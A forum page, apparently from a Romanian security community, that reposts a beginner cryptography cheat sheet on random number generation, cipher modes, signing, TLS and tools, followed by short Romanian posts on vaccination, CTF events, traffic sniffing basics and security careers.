3.7 cryptographic random number generators Many cryptographic methods require producing random numbers (such as for generating unique keys or identifiers). Traditional pseudo-random number generators produce output that can be highly predictable, as well as often starting from known states and having relatively small periods (such as 2^32). A cryptographic random number generator must make it very difficult to determine the prior (or future) state of the generator from its current output, as well as have enough entropy to generate sufficiently large random numbers. Once the Debian maintainers made a seemingly innocuous patch to the OpenSSL random number generator initialization. The unintended consequence was that it effectively seeded the generator with only about 16 bits of entropy, meaning that in particular ssh-keygen generated only about 2^16 possible 2048-bit SSH host keys when it really should have been capable of generating over 2^2000. Once this was discovered and patched a lot of people had to change their host keys (or risk “man-in-the middle” impersonation attacks). Finding useful random input to make a cryptographic random number generator truly unpredictable can be difficult. Many systems attempt to collect physically random input (such as timing of disk I/O, network packets, or keyboard input) that is “mixed” into existing random state using a cipher or cryptographic hash. 4 Cryptographic Protocols The algorithms described above are building blocks for methods of secure communication. A particular combination of these basic algorithms applied in a particular way is a cryptographic protocol. 4.1 cipher modes The simplest thing you can do with a block cipher is break plaintext up into blocks, then encrypt each block with your chosen key (also called ECB for “Electronic Code Book”, by analogy with codes that simply substituted code words). Unfortunately this leads to a weakness: if you a particular plaintext block is repeated in the input the ciphertext block also repeats in the output. This can easily happen in English text if a phrase just happens to line up with a block the same way more than once. There are other ways to use block ciphers to avoid this. The simplest is CBC or “Cipher Block Chaining” where the previous ciphertext block is XORed with the current plaintext block before encrypting it. This is reversible by decrypting a ciphertext block, then XORing the previous ciphertext block with that to recover the plaintext. There are other modes like OFB (“Output FeedBack”) that combine ciphertext and plaintext in more complicated but reversible ways so that repeated plaintext blocks won’t result in repeated ciphertext blocks. These modes also often depend on an “initialization vector” which is typically some cryptograpically random value that makes the initial state of the encryption unpredictable to an outside observer. 4.2 message signing Someone who has created a public key pair (K1, K2) and published a public key (let’s say that’s K2) can encrypt a message using their private key K1, and anyone can validate that the message came from that sender by decrypting it with the public key K2. Due to the much higher computational cost of encrypting data with public-key algorithms, usually the signer actually encrypts only a cryptographic hash of the original message. A sender can also send a plaintext message along with a signature created with their private key if the privacy of the message is not important but validating the identity of the sender is. Message signing is also the basis of SSL/TLS certificate validation. A certificate contains a public key and a signature of that key generated with the private key of a trusted certificate authority. An SSL/TLS client (such as a web browser) can confirm the authenticity of the public key by validating the certificate signature using the public key of the certificate authority that signed it. An SSL/TLS client can validate the identity of a server by encrypting a large random number with the public key in the server certificate. If the server can decrypt the random number with its private key and return it, the client can assume the server is what it says it is. “Self-signed” certificates are merely public keys signed with the corresponding private key. This isn’t as trustworthy (assuming you have reasons to trust a certificate authority) but also doesn’t require interaction with a certificate authority. However, ultimately the buck has to stop somewhere and even certificate authority “root certificates” are self-signed. Rather than the centralized certificate authority model (where certain authorities are trusted to sign certificates) email encryption tools like GPG have a “web of trust” model where someone’s public key can be signed by many other individuals or entities, so that if you trust at least some of those others it gives you greater assurance that a public key is valid and belongs to the indicated person. Without any such signatures, someone could presumably publish a key purporting to be someone else and there’d be no easy way to validate it. 4.3 secure email If you want people to be able to send you secure email (such as with PGP, GPG, or S/MIME) you create a public key pair (K1, K2) and publish the public key K2. Someone who wants to send you mail picks a cipher and generates a unique, random key for that cipher. They encrypt their plaintext message with that cipher and key and encrypt the key with your public key, and send you a message containing the ciphertext, the cipher algorithm they used, and the encrypted cipher key. You can decrypt the cipher key with your private key, and then decrypt their message from the ciphertext and indicated cipher. Note that for this model to work everyone who wants to receive encrypted email has to publish a public key. 4.4 SSL/TLS SSL (Secure Sockets Layer, now deprecated) and TLS (Transport Layer Security) use all of the above cryptographic primitives to secure data sent over a network. As a result the protocol is rather complicated, but in summary does these things: client and server agree on a “cipher suite” to use, which consists of: a method for key exchange (via the public/private key pair in a certificate or Diffie=Hellman key exchange) a method for server validation (based on the public-key algorithm used in its certificate) a symmetric cipher for bulk data encryption a hash algorithm to use for message authentication, actually an HMAC or “Hashed Message Authentication Code” that hashes a combination of a secret key and the data) establish random shared key for the symmetric cipher and HMAC using the specified key exchange method transmits data using the specified symmetric cipher and HMAC algorithms 5 Cryptanalysis Cryptanalysis is the study of weaknesses in cryptographic algorithms and protocols. In general, good algorithms and protocols have been subjected to lots of public cryptanalysis that has not resulted in attacks that are significantly better than brute-force. It’s a complex topic, and this is a pretty good introduction: https://research.checkpoint.com/cryptographic-attacks-a-guide-for-the-perplexed 6 Cryptographic tools 6.1 OpenSSL Although it’s taken a lot of heat for some of its previous security issues (particularly “Heartbleed”), it’s still the most widely used cryptographic library because of its portability and completeness. The openssl command-line utility also provideas a lot of useful functionality. It can be used to create certificate requests or even to sign certificates, encrypt/decrypt files, transform several kinds of file formats used for cryptographic data, and more. Of particular use is the openssl s_client command which can initiate an SSL/TLS client connection, but more importantly shows a lot of useful debugging data about the protocol negotiation including the certificate and cipher suite properties. 6.2 gnutls The GNU Project’s SSL/TLS library, which includes a gnutls-cli utility with similar (but less extensive) functionality for SSL/TLS client connections and encryption/decryption. 6.3 gnupg Primarily intended for encrypting or decrypting secure mail messages, it also provides some functionality for encrypting or decrypting files and creating or validating signatures. 7 General cryptographic advice 7.1 Use established, publicly analyzed algorithms and tools Schneier’s Law: “Anyone can create an algorithm that they can’t break.” https://www.schneier.com/blog/archives/2011/04/schneiers_law.html Resist the urge to create and use your own cryptographic algorithms and protocols. Cryptography is hard and even expert cryptographers have created methods that, once exposed to public analysis, have turned out to be easy to break. 7.2 Zealously protect keys and credentials Often the easiest way to break a cryptographic system is to find the keys being used. This may be easier than you think. What if you left that certificate private key in a publicly-readable file? What if it’s copied into backups that are available to other untrusted users? Think carefully about how you handle and store that kind of sensitive material. Sursa: https://cybercoastal.com/cryptography-cheat-sheet-for-beginners/
      • 2
      • Like
      • Upvote
  11. Pff, ai scos layer-ul pe care l-am pus in Photoshop Microsoft Power!
  12. Salut, nu ai ce face cu un botnet, sugestia noastra e sa iti gasesti ceva mai util de facut. Nu mai suntem prin anii 2000, haideti sa evoluam si noi.
  13. Gata, sunt vaccinat cu prima doza. Abia am simtit cand mi-au facut vaccinul. Nu am putut sa fac poza/filmez ca doamna de acolo nu a fost de acord si nu am insistat. A fost totul OK pana am plecat de acolo, apoi am crezut ca nu mai ajung in viata acasa... Conducea tipul de pe Uber de parca era la raliu. Stiam eu ca vaccinul ii afecteaza si pe cei din jur! Nu am avut febra sau alte simptome dupa, deloc. Doar o mica durere la locul injectarii cand apasam pe zona.
  14. Cel mai probabil trebuie sa prinzi pachetele care cu (SRC IP: al tau si DST PORT 80) + (DST IP: al tau si SRC PORT 80), adica request-urile si response-urile. Cred ca e deajuns daca cauti pachetele pe portul 80 (si src si dst). Intra in browser si scrie http://blabla.com - sa pui acel http inainte, ca sa fortezi traficul pe http. Si ar trebui sa apara, doar sa te asiguri ca sniffing-ul se face pe interfata corecta (eth0 sau ce o fi).
  15. Salut, nu stiu daca am inteles unde ai probleme, mi se pare ca esti pe drumul cel bun.
  16. Nytro

    Modificare apk

    Exemplu https://portswigger.net/support/configuring-an-android-device-to-work-with-burp
  17. Da, mai am un prieten care a avut simptome similare. PS: Nu face "submarin" (shot pus in halba) cu bere si gin, e crunt.
  18. Saptamana asta ma vaccinez. O sa fie Pfizer. Nu am stiut asta cand am ales centrul, dar de ceva timp, pe harta cu centrele, apare si vaccinul care se foloseste in fiecare centru de vaccinare. Incerc sa fac poza cand ma vaccinez.
  19. Sincer, in loc sa te chinui asa, vorbeste frumos cu tanti aia si convinge-o ca ea oricum plateste netul si ca nu are nimic de pierdut ca il folosesti.
  20. Salut, o mica problema, cei care mi-au trimis donatii sa imi dea PM in care sa imi zica numele cu care au trimis. Ideea e ca nu stiu exact care useri au trimis, vreau sa postez lista de useri care au donat, nu numele lor. Datele CTF: 17-18 aprilie Categorie: Incepatori Tip: Individual Premii: 3500 RON+ Platforma are inregistrarile deschise: https://ctf.rstforums.com/ Daca sunt persoane care pot ajuta cu exercitii, nu foarte dificile, astept PM.
  21. Sunt programat saptamana asta. Sper sa pot face poza/video. De unde ai scos tu procentul de 50%? Suna a Antena3/Romania TV/Realitatea sau chiar ortodoxinfo. Tocmai am intrat pe mizeria aia de site, ai nevoie de maxim 2 clase ca sa citesti ce scrie acolo. Ar trebui sa iti alegi si tu niste surse de informare mai bune sau sa discuti cu niste medici. Da un telefon la medicul de familie si vezi ce zice macar. Banuiesc ca nu ai prieteni mai educati cu care sa discuti, sau doctori. Eu cunosc si doctori si s-au vaccinat si ei si familiile lor si recomanda tuturor sa faca asta. Dar tot nu aduci argumente. Argumente. Stii ce zic? Adica nu idei idioate, fara nicio baza reala. Trebuie sa crezi ce zic, eu sunt la conducerea Noii Ordini Mondiale. Daca nu crezi, demonstreaza ca nu sunt.
  22. Salut, nu ar fi o mutare rea, cererea de persoane in domeniu e in crestere, inclusiv in Romania. Interviurile contin tot felul de intrebari, atat generale de security din orice ramura a acesteia, cat mai ales din ce are nevoie fiecare firma in parte. Cele mai multe firme cred ca lucreaza cu aplicatii web si acolo sunt necesare cunostiinte detaliate de vulnerabilitati web. Nu stiu cat de mult ajuta un master, cel putin in tara. E bine sa il ai daca nu te incurca cu nimic, daca doar mergi acolo din cand in cand si la examene. Cam asa e cu partea de security, job-uri pe parte de defensive, de analiza de atacuri, SOC (Security Operations Center) si altele unde ajuta cunostiintele de administrator de sistem si parte de offensive unde skill-urile necesara sunt putin diferite, dar nu cu mult - putina programare ajuta aici, destul de mult, protocoale si multe altele.
  23. SUSPECTE. Daca cineva se vaccineaza si ulterior moare, din orice fel de conditie medicala, se ia in considerare si vaccinul. Asta nu inseamna ca vaccinul e de vina. "99 circumstanțe sociale incl. 2 decese 138 Proceduri chirurgicale și medicale incl. 4 decese 1.977 Tulburări oculare incl. 1 moarte 2.676 Tulburări de metabolism și nutriție incl. 5 decese" Sunt cateva exemple. Totusi, vaccinul asta e super-criminal daca ucide din tot felul de astfel de motive. Apoi: - 4000 de decese POSIBIL (desi slabe sanse) - 138 de MILIOANE de vaccinari - Decese Covid-19 - 2.84 MILIOANE Covid: Cases 130M 130,000,000 Recovered 73.9M 73,900,000 Deaths 2.84M 2,840,000 Adica, pe scurt, pentru cei care nu stiu sa citeasca: - 130 de milioane de cazuri de Covid rezulta in 2,84 MILIOANE de morti. Adica 2840000. - 130 de milioane de vaccinari anti-covid rezulta in POATE 4000 de morti. Adica 4000. Hai sa nu ne vaccinam, nu? Multi oameni fara simt elementar de logica. Va meritati soarta.
  24. Salut, nu poti sa il decriptezi pentru ca nu e criptat. E probabil un format binar, acei bytes in hex au ceva insemnatate. E dificil sa faci "reversing" pe un astfel de text, poti sa deduci anumite lucruri, dar complet e foarte greu. O solutie ar fi sa stii ce program in genereaza si reverse engineering pe el ar trebui sa spuna cam ce contine fisierul.
  25. Nu e o prostie, o sa iti dovedesc, iti dau un link prin care sa te inregistrezi. Si va puteti inregistra toti, o sa ploua cu bani pe voi!!! PS: Glumesc, evident Da, nu am idee daca se poate face ceva. Nu stiu daca incalca ceva legi si nici ce s-ar putea face in aceasta privinta, desi e o forma de inselaciune. Pana la urma, Darwin stia ce zice.
×
×
  • Create New...